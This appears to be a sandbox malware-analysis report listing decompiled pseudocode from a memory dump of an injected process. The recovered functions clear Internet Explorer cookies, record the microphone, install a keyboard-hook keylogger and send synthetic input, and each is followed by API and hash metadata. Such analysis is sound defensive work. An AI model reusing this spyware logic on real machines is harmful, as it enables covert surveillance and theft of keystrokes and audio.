                				void* __ebp;
                				void* _t17;
                				void* _t20;
                				int _t34;
                				void* _t40;
                				void* _t41;
                				char* _t42;
                				void* _t48;
                				void* _t60;
                				void* _t62;
                				void* _t63;
                				void* _t64;
                
                				_t42 =  &_v28;
                				E004020BF(_t40, _t42);
                				_push(_t42);
                				_t41 = 0;
                				_t17 = E0041288E( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                				_t64 = _t63 + 0xc;
                				E00401FC2( &_v28, 0x80000001, _t60, _t17);
                				E00401FB8();
                				_t59 = 0x464074;
                				_t20 = E00405AE5(0x464074);
                				_t68 = _t20;
                				if(_t20 == 0) {
                					ExpandEnvironmentStringsA(E00401F8B( &_v28),  &_v340, 0x104);
                					__eflags = PathFileExistsA( &_v340);
                					if(__eflags == 0) {
                						goto L1;
                					} else {
                						E00402073(0,  &_v52, 0x464074, _t62,  &_v340);
                						_t59 =  &_v52;
                						_t34 = E0041AC0A(E00401EE4(E0041A7B9( &_v76,  &_v52)),  &_v52);
                						E00401EE9();
                						E00401FB8();
                						__eflags = _t34;
                						if(__eflags == 0) {
                							__eflags = E00406155(0x473950, "XP", 0);
                							if(__eflags != 0) {
                								_t41 = 1;
                								E00402073(1, _t64 - 0x18,  &_v52, _t62, "\n[IE cookies cleared!]");
                								E0040B752(1,  &_v52, _t62, __eflags);
                								goto L8;
                							}
                						} else {
                							_t48 = _t64 - 0x18;
                							_push("\n[IE cookies cleared!]");
                							goto L2;
                						}
                					}
                				} else {
                					L1:
                					_t48 = _t64 - 0x18;
                					_push("\n[IE cookies not found]");
                					L2:
                					E00402073(_t41, _t48, _t59, _t62);
                					E0040B752(_t41, _t59, _t62, _t68);
                					_t41 = 1;
                					L8:
                				}
                				E00401FB8();
                				return _t41;
                			}

                APIs
                  • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                  • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                  • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B4E5
                • PathFileExistsA.SHLWAPI(?), ref: 0040B4F2
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P9G$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                • API String ID: 1133728706-1387963244
                • Opcode ID: 8dfa34e795b2460f711c9433afd99fad6450ed803a30207b2e654047f2334ff6
                • Instruction ID: ea656425d40d7a45f5e056d43768dd8003def9e5f0b6d0ab8c53a167709f9c7c
                • Opcode Fuzzy Hash: 8dfa34e795b2460f711c9433afd99fad6450ed803a30207b2e654047f2334ff6
                • Instruction Fuzzy Hash: DB214F31A402096ACB04F7E1DD96EEE77689E51708F40017FB901772C2EB7C9A45C6DE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00401BC9(void* __eflags) {
                				signed short _t3;
                				signed int _t7;
                				signed int _t15;
                				signed int _t24;
                				signed int _t25;
                				void* _t33;
                				intOrPtr* _t34;
                				void* _t35;
                
                				_t35 = __eflags;
                				CreateDirectoryW(E00401EE4(0x472d40), 0);
                				_t3 = 8;
                				 *0x470ab6 = _t3;
                				 *0x470aac = 0x1f40;
                				 *0x470ab0 = 0x1f40;
                				0x470aa8->wFormatTag = 1;
                				 *0x470aaa = 1;
                				 *0x470ab4 = 1;
                				 *0x470ab8 = 0;
                				_t7 = E0043A3AC(_t5, E00401F8B(E00401E45(0x473298, 1, _t33, _t35, 0x24)));
                				_t24 =  *0x470aac; // 0x0
                				 *_t34 = 0x30008;
                				_t25 = _t24 * _t7 * 0x3c;
                				 *0x470abc = _t25;
                				 *0x470ac4 = (( *0x470ab6 & 0x0000ffff) >> 3) * _t25;
                				waveInOpen(0x470ac0, 0xffffffff, 0x470aa8, E00401CEB, 0, ??);
                				E00401F7D( *0x470ac4);
                				0x470a88->lpData = E00401F8B(0x472d58);
                				_t15 =  *0x470ac4; // 0x0
                				 *0x470a8c = _t15;
                				 *0x470a90 = 0;
                				 *0x470a94 = 0;
                				 *0x470a98 = 0;
                				 *0x470a9c = 0;
                				waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
                				waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
                				waveInStart( *0x470ac0);
                				return 0;
                			}

                APIs
                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                • waveInOpen.WINMM(00470AC0,000000FF,00470AA8,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401CC3
                • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401CD2
                • waveInStart.WINMM ref: 00401CDE
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                • String ID: @-G$X-G
                • API String ID: 1356121797-233566475
                • Opcode ID: 555486e1d5cfe24e7a994e895008b2a4ca36706a3805184ddfe35c63d73dbc88
                • Instruction ID: d9f75f8a904554b1551795dc4e374556cb90ebe8a53537c147534bfad38ff794
                • Opcode Fuzzy Hash: 555486e1d5cfe24e7a994e895008b2a4ca36706a3805184ddfe35c63d73dbc88
                • Instruction Fuzzy Hash: 5C213771616300DBC754AFAAFC09A6A7BA9EBB5315F00843EB10DD76F1DBB844818B5C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E004098BB(struct HHOOK__** __ecx) {
                				struct tagMSG _v32;
                				char _v60;
                				void* _v64;
                				void* __edi;
                				void* __ebp;
                				int _t7;
                				void* _t8;
                				struct HHOOK__* _t14;
                				void* _t16;
                				void* _t22;
                				struct HHOOK__** _t34;
                				void* _t36;
                				signed int _t37;
                				void* _t39;
                
                				_t39 = (_t37 & 0xfffffff8) - 0x38;
                				_t34 = __ecx;
                				 *0x470b24 = __ecx;
                				if( *((intOrPtr*)(__ecx)) != 0) {
                					goto L3;
                				} else {
                					_t14 = SetWindowsHookExA(0xd, E004098A7, GetModuleHandleA(0), 0);
                					 *_t34 = _t14;
                					_t44 = _t14;
                					if(_t14 != 0) {
                						while(1) {
                							L3:
                							_t7 = GetMessageA( &_v32, 0, 0, 0);
                							__eflags = _t7;
                							if(_t7 == 0) {
                								break;
                							}
                							TranslateMessage( &_v32);
                							DispatchMessageA( &_v32);
                							__eflags =  *_t34;
                							if( *_t34 != 0) {
                								continue;
                							}
                							break;
                						}
                						_t8 = 0;
                						__eflags = 0;
                					} else {
                						_t16 = E0041A6E9(_t22,  &_v60, GetLastError());
                						_t40 = _t39 - 0x18;
                						E004052DD(_t22, _t39 - 0x18, "Keylogger initialization failure: error ", _t36, _t44, _t16);
                						E00402073(_t22, _t40 - 0x14, "Keylogger initialization failure: error ", _t36, "E");
                						E0041A04A(_t22, 0);
                						E00401FB8();
                						_t8 = 1;
                					}
                				}
                				return _t8;
                			}

                APIs
                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004098D6
                • SetWindowsHookExA.USER32 ref: 004098E4
                • GetLastError.KERNEL32 ref: 004098F0
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • GetMessageA.USER32 ref: 0040993E
                • TranslateMessage.USER32(?), ref: 0040994D
                • DispatchMessageA.USER32 ref: 00409958
                Strings
                • Keylogger initialization failure: error , xrefs: 00409904
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                • String ID: Keylogger initialization failure: error
                • API String ID: 3219506041-952744263
                • Opcode ID: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                • Instruction ID: c40f6cef292aa3bb57f49984c9f8b97dc6da6adf0f265d4e9e2bb6cec8c4e7f3
                • Opcode Fuzzy Hash: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                • Instruction Fuzzy Hash: E81154726053016BC7107B76EC0A86B77ECDB95715F10467EF891E22A2EB38D940C76A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E004494C9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				signed int _t49;
                				signed int _t54;
                				int _t58;
                				signed int _t60;
                				short* _t62;
                				signed int _t66;
                				short* _t70;
                				int _t71;
                				int _t78;
                				short* _t81;
                				signed int _t87;
                				signed int _t90;
                				void* _t95;
                				void* _t96;
                				int _t98;
                				short* _t101;
                				int _t103;
                				signed int _t106;
                				short* _t107;
                				void* _t110;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t49 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t49 ^ _t106;
                				_push(__esi);
                				_t103 = _a20;
                				if(_t103 > 0) {
                					_t78 = E00444FE6(_a16, _t103);
                					_t110 = _t78 - _t103;
                					_t4 = _t78 + 1; // 0x1
                					_t103 = _t4;
                					if(_t110 >= 0) {
                						_t103 = _t78;
                					}
                				}
                				_t98 = _a32;
                				if(_t98 == 0) {
                					_t98 =  *( *_a4 + 8);
                					_a32 = _t98;
                				}
                				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					return E004338BB(_v8 ^ _t106);
                				} else {
                					_t95 = _t54 + _t54;
                					_t85 = _t95 + 8;
                					asm("sbb eax, eax");
                					if((_t95 + 0x00000008 & _t54) == 0) {
                						_t81 = 0;
                						__eflags = 0;
                						L14:
                						if(_t81 == 0) {
                							L36:
                							_t105 = 0;
                							L37:
                							E00434713(_t81);
                							goto L38;
                						}
                						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                						_t121 = _t58;
                						if(_t58 == 0) {
                							goto L36;
                						}
                						_t100 = _v12;
                						_t60 = E00447433(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                						_t105 = _t60;
                						if(_t105 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t96 = _t105 + _t105;
                							_t87 = _t96 + 8;
                							__eflags = _t96 - _t87;
                							asm("sbb eax, eax");
                							__eflags = _t87 & _t60;
                							if((_t87 & _t60) == 0) {
                								_t101 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t101;
                								if(__eflags == 0) {
                									L35:
                									E00434713(_t101);
                									goto L36;
                								}
                								_t62 = E00447433(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                								__eflags = _t62;
                								if(_t62 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                								__eflags = _t105;
                								if(_t105 != 0) {
                									E00434713(_t101);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t90 = _t96 + 8;
                							__eflags = _t96 - _t90;
                							asm("sbb eax, eax");
                							_t66 = _t60 & _t90;
                							_t87 = _t96 + 8;
                							__eflags = _t66 - 0x400;
                							if(_t66 > 0x400) {
                								__eflags = _t96 - _t87;
                								asm("sbb eax, eax");
                								_t101 = E00444A38(_t87, _t66 & _t87);
                								_pop(_t87);
                								__eflags = _t101;
                								if(_t101 == 0) {
                									goto L35;
                								}
                								 *_t101 = 0xdddd;
                								L28:
                								_t101 =  &(_t101[4]);
                								goto L30;
                							}
                							__eflags = _t96 - _t87;
                							asm("sbb eax, eax");
                							E00455A90();
                							_t101 = _t107;
                							__eflags = _t101;
                							if(_t101 == 0) {
                								goto L35;
                							}
                							 *_t101 = 0xcccc;
                							goto L28;
                						}
                						_t70 = _a28;
                						if(_t70 == 0) {
                							goto L37;
                						}
                						_t125 = _t105 - _t70;
                						if(_t105 > _t70) {
                							goto L36;
                						}
                						_t71 = E00447433(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                						_t105 = _t71;
                						if(_t71 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t72 = _t54 & _t95 + 0x00000008;
                					_t85 = _t95 + 8;
                					if((_t54 & _t95 + 0x00000008) > 0x400) {
                						__eflags = _t95 - _t85;
                						asm("sbb eax, eax");
                						_t81 = E00444A38(_t85, _t72 & _t85);
                						_pop(_t85);
                						__eflags = _t81;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t81 = 0xdddd;
                						L12:
                						_t81 =  &(_t81[4]);
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E00455A90();
                					_t81 = _t107;
                					if(_t81 == 0) {
                						goto L36;
                					}
                					 *_t81 = 0xcccc;
                					goto L12;
                				}
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 00449523
                • __alloca_probe_16.LIBCMT ref: 0044955B
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 004495A9
                • __alloca_probe_16.LIBCMT ref: 00449640
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004496A3
                • __freea.LIBCMT ref: 004496B0
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • __freea.LIBCMT ref: 004496B9
                • __freea.LIBCMT ref: 004496DE
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 9f70c11f76ab57f902672a967c00ed4b2c564638ce67ce0a9dbf457e697ef647
                • Instruction ID: 16b5e23e06f44e8f5b9cde4bfd472c7b38c402739d6472c7ebbca8c933d1a93d
                • Opcode Fuzzy Hash: 9f70c11f76ab57f902672a967c00ed4b2c564638ce67ce0a9dbf457e697ef647
                • Instruction Fuzzy Hash: C7510572A00216AFFB259F65CC81EBF77A9EB44750F16462EFC05D7240EB38DC50A698
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00418527
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418548
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418568
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041857C
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418592
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185AF
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185CA
                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 004185E6
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InputSend
                • String ID:
                • API String ID: 3431551938-0
                • Opcode ID: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                • Instruction ID: 0947e47258becacd92e061a94fe1ad349a6366cffbcd8e1d8fee47d4855f6fd4
                • Opcode Fuzzy Hash: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                • Instruction Fuzzy Hash: 9C318131558309BEE311CF51DD41BEBBBDCEF98B54F00080FF6808A191D6A695C98BA7
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E00445DF1(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                				signed int _v8;
                				short _v10;
                				short _v12;
                				short _v14;
                				short _v16;
                				short _v18;
                				short _v22;
                				char _v24;
                				signed int _v28;
                				signed int* _v32;
                				signed int _v33;
                				signed int** _v40;
                				intOrPtr _v44;
                				intOrPtr* _v48;
                				char _v52;
                				void* _v64;
                				signed int _t86;
                				intOrPtr _t91;
                				signed int _t94;
                				signed int _t95;
                				signed int _t96;
                				void* _t97;
                				signed int _t98;
                				signed int _t102;
                				signed int _t103;
                				signed int _t104;
                				intOrPtr _t105;
                				signed int _t110;
                				void* _t111;
                				signed int _t116;
                				signed int _t117;
                				signed int _t129;
                				void* _t133;
                				signed int _t135;
                				intOrPtr _t143;
                				signed short* _t144;
                				intOrPtr _t145;
                				signed int** _t146;
                				signed int _t147;
                				signed int* _t148;
                				signed int _t149;
                				signed int _t152;
                				signed short** _t154;
                				signed int _t155;
                				signed int _t159;
                				signed int _t163;
                				intOrPtr* _t171;
                				signed short _t172;
                				signed short* _t173;
                				signed int** _t174;
                				void* _t175;
                				void* _t177;
                				signed short* _t179;
                				intOrPtr* _t180;
                				intOrPtr* _t181;
                				signed int* _t183;
                				signed int _t184;
                				signed int** _t185;
                				signed int _t186;
                				signed int _t187;
                				signed int _t188;
                
                				_t149 = __ecx;
                				_t86 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t86 ^ _t187;
                				_t171 = _a12;
                				_v52 = _a4;
                				_t143 = _a24;
                				_v40 = _a16;
                				_v48 = _t171;
                				_v44 = _t143;
                				_t183 = _a20;
                				_v32 = _t183;
                				_t91 = _a8;
                				if(_t91 == 0) {
                					_t179 =  *(_t143 + 0x154);
                				} else {
                					if(_t91 == 1) {
                						_t179 =  *(_t143 + 0x158);
                					} else {
                						_t179 =  *(_t143 + 0x15c);
                					}
                				}
                				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
                					goto L113;
                				} else {
                					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
                					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
                					_v33 = _t163;
                					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
                					_v18 =  *((intOrPtr*)(_t171 + 0xc));
                					_v16 =  *((intOrPtr*)(_t171 + 8));
                					_v14 =  *((intOrPtr*)(_t171 + 4));
                					_v12 =  *_t171;
                					_v10 = 0;
                					_t194 = _t163;
                					if(_t163 == 0) {
                						__eflags = 0;
                						_t129 = E004470EB(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
                					} else {
                						_t129 = E0044722D(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
                					}
                					_t147 = _t129;
                					if(_t147 == 0) {
                						goto L113;
                					} else {
                						_t175 = _t147 + _t147;
                						_t165 = _t175 + 8;
                						asm("sbb eax, eax");
                						if((_t175 + 0x00000008 & _t129) == 0) {
                							_t184 = 0;
                							__eflags = 0;
                							L18:
                							_v28 = _t184;
                							if(_t184 == 0) {
                								L30:
                								E00434713(0);
                								_t183 = _v32;
                								while(1) {
                									L113:
                									_t172 =  *_t179 & 0x0000ffff;
                									__eflags = _t172;
                									if(_t172 == 0) {
                										break;
                									}
                									__eflags =  *_t183;
                									if( *_t183 == 0) {
                										L28:
                										L29:
                										return E004338BB(_v8 ^ _t187);
                									}
                									_v32 = 0;
                									_t152 = 0;
                									__eflags = 0;
                									_v28 = _t179;
                									_t144 = _t179;
                									_t94 = _t172 & 0x0000ffff;
                									do {
                										_t144 =  &(_t144[1]);
                										_t152 = _t152 + 1;
                										__eflags =  *_t144 - _t94;
                									} while ( *_t144 == _t94);
                									_t95 = _t172 & 0x0000ffff;
                									_v28 = _t144;
                									_t145 = _v44;
                									__eflags = _t95 - 0x64;
                									if(__eflags > 0) {
                										_t96 = _t95 - 0x68;
                										__eflags = _t96;
                										if(_t96 == 0) {
                											_t153 = _t152 - 1;
                											__eflags = _t153;
                											if(_t153 == 0) {
                												_v32 = 1;
                												L110:
                												_push(0x49);
                												L111:
                												_pop(_t97);
                												_t84 =  &_v52; // 0x446368
                												_t98 = E004451BB(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
                												_t188 = _t188 + 0x1c;
                												__eflags = _t98;
                												if(_t98 == 0) {
                													 *((intOrPtr*)(E0043EEAD())) = 0x16;
                													goto L29;
                												}
                												L112:
                												_t179 = _v28;
                												continue;
                											}
                											_t153 = _t153 - 1;
                											__eflags = _t153;
                											if(_t153 == 0) {
                												goto L110;
                											}
                											L108:
                											_t154 = _v40;
                											_t179 =  &(_t179[1]);
                											 *( *_t154) = _t172;
                											 *_t154 =  &(( *_t154)[1]);
                											 *_t183 =  *_t183 - 1;
                											continue;
                										}
                										_t102 = _t96 - 5;
                										__eflags = _t102;
                										if(_t102 == 0) {
                											_t153 = _t152 - 1;
                											__eflags = _t153;
                											if(_t153 == 0) {
                												_v32 = 1;
                												L105:
                												_push(0x4d);
                												goto L111;
                											}
                											_t153 = _t153 - 1;
                											__eflags = _t153;
                											if(_t153 == 0) {
                												goto L105;
                											}
                											goto L108;
                										}
                										_t103 = _t102 - 6;
                										__eflags = _t103;
                										if(_t103 == 0) {
                											_t153 = _t152 - 1;
                											__eflags = _t153;
                											if(_t153 == 0) {
                												_v32 = 1;
                												L100:
                												_push(0x53);
                												goto L111;
                											}
                											_t153 = _t153 - 1;
                											__eflags = _t153;
                											if(_t153 == 0) {
                												goto L100;
                											}
                											goto L108;
                										}
                										_t104 = _t103 - 1;
                										__eflags = _t104;
                										if(_t104 == 0) {
                											_t105 = _v48;
                											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
                											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
                												_t173 =  *(_t145 + 0x150);
                											} else {
                												_t173 =  *(_t145 + 0x14c);
                											}
                											__eflags = _t152 - 1;
                											if(_t152 != 1) {
                												L91:
                												_t155 =  *_t173 & 0x0000ffff;
                												__eflags = _t155;
                												if(_t155 == 0) {
                													goto L112;
                												}
                												_t146 = _v40;
                												while(1) {
                													__eflags =  *_t183;
                													if( *_t183 <= 0) {
                														goto L112;
                													}
                													_t173 =  &(_t173[1]);
                													 *( *_t146) = _t155;
                													 *_t146 =  &(( *_t146)[0]);
                													 *_t183 =  *_t183 - 1;
                													_t155 =  *_t173 & 0x0000ffff;
                													__eflags = _t155;
                													if(_t155 != 0) {
                														continue;
                													}
                													goto L112;
                												}
                											} else {
                												__eflags =  *_t183;
                												if( *_t183 <= 0) {
                													goto L91;
                												}
                												_t180 = _v40;
                												 *((short*)( *_t180)) =  *_t173;
                												 *_t180 =  *_t180 + 2;
                												 *_t183 =  *_t183 - 1;
                											}
                											goto L112;
                										}
                										__eflags = _t104 != 5;
                										if(_t104 != 5) {
                											goto L108;
                										}
                										_t153 = _t152;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											_push(0x79);
                											goto L111;
                										}
                										_t153 = _t153;
                										__eflags = _t153;
                										if(_t153 != 0) {
                											goto L108;
                										}
                										_push(0x59);
                										goto L111;
                									}
                									if(__eflags == 0) {
                										_t153 = _t152 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											_v32 = 1;
                											L75:
                											_push(0x64);
                											goto L111;
                										}
                										_t153 = _t153 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											goto L75;
                										}
                										_t153 = _t153 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											_push(0x61);
                											goto L111;
                										}
                										_t153 = _t153 - 1;
                										__eflags = _t153;
                										if(_t153 != 0) {
                											goto L108;
                										}
                										_push(0x41);
                										goto L111;
                									}
                									__eflags = _t95 - 0x27;
                									if(_t95 == 0x27) {
                										_t110 = _t152 & 0x80000001;
                										__eflags = _t110;
                										if(__eflags < 0) {
                											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
                										}
                										_t179 =  &(_t179[_t152]);
                										if(__eflags == 0) {
                											_t159 =  *_t179 & 0x0000ffff;
                											__eflags = _t159;
                											if(_t159 == 0) {
                												goto L28;
                											}
                											_t174 = _v40;
                											while(1) {
                												__eflags =  *_t183;
                												if( *_t183 == 0) {
                													goto L113;
                												}
                												_t111 = 0x27;
                												_t179 =  &(_t179[1]);
                												__eflags = _t159 - _t111;
                												if(_t159 == _t111) {
                													goto L113;
                												}
                												 *( *_t174) = _t159;
                												 *_t174 =  &(( *_t174)[0]);
                												 *_t183 =  *_t183 - 1;
                												_t159 =  *_t179 & 0x0000ffff;
                												__eflags = _t159;
                												if(_t159 != 0) {
                													continue;
                												}
                												goto L113;
                											}
                										}
                										continue;
                									}
                									__eflags = _t95 - 0x41;
                									if(_t95 == 0x41) {
                										L41:
                										_t116 = E00452294(_t145, _t179, _t183, _t179, L"am/pm");
                										__eflags = _t116;
                										if(_t116 != 0) {
                											_t117 = E00452294(_t145, _t179, _t183, _t179, L"a/p");
                											_pop(_t153);
                											__eflags = _t117;
                											if(_t117 == 0) {
                												_v28 =  &(_t179[3]);
                											}
                										} else {
                											_t153 =  &(_t179[5]);
                											_v28 =  &(_t179[5]);
                										}
                										_push(0x70);
                										goto L111;
                									}
                									__eflags = _t95 - 0x48;
                									if(_t95 == 0x48) {
                										_t153 = _t152 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											_v32 = 1;
                											L55:
                											_push(0x48);
                											goto L111;
                										}
                										_t153 = _t153 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											goto L55;
                										}
                										goto L108;
                									}
                									__eflags = _t95 - 0x4d;
                									if(_t95 == 0x4d) {
                										_t153 = _t152 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											_v32 = 1;
                											L50:
                											_push(0x6d);
                											goto L111;
                										}
                										_t153 = _t153 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											goto L50;
                										}
                										_t153 = _t153 - 1;
                										__eflags = _t153;
                										if(_t153 == 0) {
                											_push(0x62);
                											goto L111;
                										}
                										_t153 = _t153 - 1;
                										__eflags = _t153;
                										if(_t153 != 0) {
                											goto L108;
                										}
                										_push(0x42);
                										goto L111;
                									}
                									__eflags = _t95 - 0x61;
                									if(_t95 != 0x61) {
                										goto L108;
                									}
                									goto L41;
                								}
                								goto L28;
                							}
                							_t203 = _v33;
                							if(_v33 == 0) {
                								_t133 = E004470EB(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
                							} else {
                								_t133 = E0044722D(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
                							}
                							_t181 = _t184;
                							_t177 = _t133 - 1;
                							if(_t177 <= 0) {
                								L27:
                								E00434713(_t184);
                								goto L28;
                							} else {
                								_t148 = _v32;
                								_t185 = _v40;
                								while( *_t148 > 0) {
                									_t135 =  *_t181;
                									_t181 = _t181 + 2;
                									 *( *_t185) = _t135;
                									 *_t185 =  &(( *_t185)[0]);
                									 *_t148 =  *_t148 - 1;
                									_t177 = _t177 - 1;
                									if(_t177 > 0) {
                										continue;
                									}
                									break;
                								}
                								_t184 = _v28;
                								goto L27;
                							}
                						}
                						asm("sbb eax, eax");
                						_t137 = _t129 & _t175 + 0x00000008;
                						_t165 = _t175 + 8;
                						if((_t129 & _t175 + 0x00000008) > 0x400) {
                							__eflags = _t175 - _t165;
                							asm("sbb eax, eax");
                							_t186 = E00444A38(_t165, _t137 & _t165);
                							_v28 = _t186;
                							_pop(_t165);
                							__eflags = _t186;
                							if(__eflags == 0) {
                								goto L30;
                							}
                							 *_t186 = 0xdddd;
                							L14:
                							_t184 = _t186 + 8;
                							goto L18;
                						}
                						asm("sbb eax, eax");
                						E00455A90();
                						_t186 = _t188;
                						_v28 = _t186;
                						if(_t186 == 0) {
                							goto L30;
                						}
                						 *_t186 = 0xcccc;
                						goto L14;
                					}
                				}
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
